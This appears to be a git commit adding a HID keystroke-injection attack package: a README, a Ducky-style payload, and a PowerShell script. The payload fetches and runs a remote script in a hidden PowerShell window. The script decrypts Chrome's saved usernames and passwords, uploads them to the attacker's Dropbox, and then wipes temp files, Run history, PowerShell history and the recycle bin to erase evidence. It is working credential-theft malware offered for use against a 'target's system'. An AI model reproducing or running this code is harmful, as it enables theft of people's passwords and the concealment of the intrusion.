commit
539901e2e7
|
@ -0,0 +1,30 @@
|
||||||
|
## About:
|
||||||
|
* Title: Browser-Passwords-Dropbox-Exfiltration
|
||||||
|
* Description: Opens PowerShell hidden, grabs Chrome passwords, saves as a cleartext file and exfiltrates info via Dropbox.
|
||||||
|
* Then it cleans up traces of what you have done after.
|
||||||
|
* AUTHOR: DIYS.py
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Credentials, Exfiltration
|
||||||
|
* Target: Windows 10
|
||||||
|
* Attackmodes: HID
|
||||||
|
|
||||||
|
### Features:
|
||||||
|
* Reasonably stelathy
|
||||||
|
* Fairly quick
|
||||||
|
|
||||||
|
### Workflow:
|
||||||
|
* Encoding payload and injecting on target's system.
|
||||||
|
* Checks Chrome files and obtains the stored browser credentials
|
||||||
|
* Saves a plaintext file of all of the usernames, passwords, websites
|
||||||
|
* Deletes the Temp files, recycle bin, Run and PowerShell history
|
||||||
|
|
||||||
|
### Usage Version 01:
|
||||||
|
1. Follow the instructions on the link enclosed in the PowerShell script to create the correct API access credentials for your Dropbox account.
|
||||||
|
2. Obtain your Authentication Token and add it to the PowerShell script, upload that script to your dropbox and add the link to it in the payload file.
|
||||||
|
3. Encode payload.txt and inject into target's system.
|
||||||
|
4. Check your Dropbox for the files.
|
||||||
|
|
||||||
|
### Possible Issues:
|
||||||
|
1. AVG detected this was trying to access Chrome info and blocked it from working some of the time.
|
||||||
|
|
||||||
|
DIYSpy on Twitter
|
|
@ -0,0 +1,101 @@
|
||||||
|
#########################################################################################################
|
||||||
|
# | #
|
||||||
|
# Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
|
||||||
|
# Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
|
||||||
|
# Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
|
||||||
|
# Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
|
||||||
|
# Target : Windows 10 | |____/___| |_| |____(_) .__/ \__, | #
|
||||||
|
# Mode : HID | |_| |___/ #
|
||||||
|
# Props : I am Jakoby, NULLSESSION0X | #
|
||||||
|
# | #
|
||||||
|
#########################################################################################################
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
This script exfiltrates credentials from the browser via Dropbox.
|
||||||
|
.DESCRIPTION
|
||||||
|
Checkes and saves the credentials from the Chrome browser, then connects to Dropbox and uploads
|
||||||
|
the file containing all of the loot.
|
||||||
|
.Link
|
||||||
|
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
|
||||||
|
#>
|
||||||
|
|
||||||
|
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
|
||||||
|
|
||||||
|
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
|
||||||
|
|
||||||
|
#Stage 1 Obtain the credentials from the Chrome browsers User Data folder
|
||||||
|
|
||||||
|
#First we Kill Chrome just to be safe
|
||||||
|
Stop-Process -Name Chrome
|
||||||
|
|
||||||
|
$d=Add-Type -A System.Security
|
||||||
|
$p='public static'
|
||||||
|
$g=""")]$p extern"
|
||||||
|
$i='[DllImport("winsqlite3",EntryPoint="sqlite3_'
|
||||||
|
$m="[MarshalAs(UnmanagedType.LP"
|
||||||
|
$q='(s,i)'
|
||||||
|
$f='(p s,int i)'
|
||||||
|
$z=$env:LOCALAPPDATA+'\Google\Chrome\User Data'
|
||||||
|
$u=[Security.Cryptography.ProtectedData]
|
||||||
|
Add-Type "using System.Runtime.InteropServices;using p=System.IntPtr;$p class W{$($i)open$g p O($($m)Str)]string f,out p d);$($i)prepare16_v2$g p P(p d,$($m)WStr)]string l,int n,out p s,p t);$($i)step$g p S(p s);$($i)column_text16$g p C$f;$($i)column_bytes$g int Y$f;$($i)column_blob$g p L$f;$p string T$f{return Marshal.PtrToStringUni(C$q);}$p byte[] B$f{var r=new byte[Y$q];Marshal.Copy(L$q,r,0,Y$q);return r;}}"
|
||||||
|
$s=[W]::O("$z\\Default\\Login Data",[ref]$d)
|
||||||
|
$l=@()
|
||||||
|
if($host.Version-like"7*"){$b=(gc "$z\\Local State"|ConvertFrom-Json).os_crypt.encrypted_key
|
||||||
|
$x=[Security.Cryptography.AesGcm]::New($u::Unprotect([Convert]::FromBase64String($b)[5..($b.length-1)],$n,0))}$_=[W]::P($d,"SELECT*FROM logins WHERE blacklisted_by_user=0",-1,[ref]$s,0)
|
||||||
|
for(;!([W]::S($s)%100)){$l+=[W]::T($s,0),[W]::T($s,3)
|
||||||
|
$c=[W]::B($s,5)
|
||||||
|
try{$e=$u::Unprotect($c,$n,0)}catch{if($x){$k=$c.length
|
||||||
|
$e=[byte[]]::new($k-31)
|
||||||
|
$x.Decrypt($c[3..14],$c[15..($k-17)],$c[($k-16)..($k-1)],$e)}}$l+=($e|%{[char]$_})-join''}
|
||||||
|
#After Decrypting the contents of the files, save them to a file in the temp folder.
|
||||||
|
|
||||||
|
echo $l >> $env:TMP\$FileName
|
||||||
|
|
||||||
|
#Start Chrome again
|
||||||
|
|
||||||
|
$pathToChrome = 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
|
||||||
|
Start-Process -FilePath $pathToChrome
|
||||||
|
|
||||||
|
#Stage 2 Upload them to Dropbox
|
||||||
|
|
||||||
|
<#
|
||||||
|
.NOTES
|
||||||
|
This is to upload your files to dropbox
|
||||||
|
#>
|
||||||
|
|
||||||
|
$TargetFilePath="/$FileName"
|
||||||
|
$SourceFilePath="$env:TMP\$FileName"
|
||||||
|
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
||||||
|
$authorization = "Bearer " + $DropBoxAccessToken
|
||||||
|
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
||||||
|
$headers.Add("Authorization", $authorization)
|
||||||
|
$headers.Add("Dropbox-API-Arg", $arg)
|
||||||
|
$headers.Add("Content-Type", 'application/octet-stream')
|
||||||
|
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
||||||
|
|
||||||
|
|
||||||
|
#Stage 3 Cleanup Traces
|
||||||
|
|
||||||
|
<#
|
||||||
|
.NOTES
|
||||||
|
This is to clean up behind you and remove any evidence to prove you were there
|
||||||
|
#>
|
||||||
|
|
||||||
|
# Delete contents of Temp folder
|
||||||
|
|
||||||
|
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||||
|
|
||||||
|
# Delete run box history
|
||||||
|
|
||||||
|
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||||
|
|
||||||
|
# Delete powershell history
|
||||||
|
|
||||||
|
Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||||
|
|
||||||
|
# Deletes contents of recycle bin
|
||||||
|
|
||||||
|
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||||
|
|
||||||
|
exit
|
|
@ -0,0 +1,25 @@
|
||||||
|
REM #########################################################################################################
|
||||||
|
REM # | #
|
||||||
|
REM # Title : Browser-Passwords-Dropbox-Exfiltration | ____ _____ ______ #
|
||||||
|
REM # Author : DIYS.py | | _ \_ _\ \ / / ___| _ __ _ _ #
|
||||||
|
REM # Version : 1.0 | | | | | | \ V /\___ \ | '_ \| | | | #
|
||||||
|
REM # Category : Credentials, Exfiltration | | |_| | | | | ___) || |_) | |_| | #
|
||||||
|
REM # Target : Windows 10 (PowerShell + Chrome) | |____/___| |_| |____(_) .__/ \__, | #
|
||||||
|
REM # Mode : HID | |_| |___/ #
|
||||||
|
REM # Props : I am Jakoby, NULLSESSION0X | #
|
||||||
|
REM # Description : Opens PowerShell hidden, grabs Chrome | #
|
||||||
|
REM # passwords, saves as a cleartext file and | #
|
||||||
|
REM # exfiltrates info via Dropbox. | #
|
||||||
|
REM # Then it cleans up traces of what you have done | #
|
||||||
|
REM # after. | #
|
||||||
|
REM #########################################################################################################
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
|
||||||
|
DELAY 3000
|
||||||
|
GUI r
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://< Your Shared link for the intended file>?dl=1; invoke-expression $pl
|
||||||
|
|
||||||
|
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
||||||
|
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
Loading…
Reference in New Issue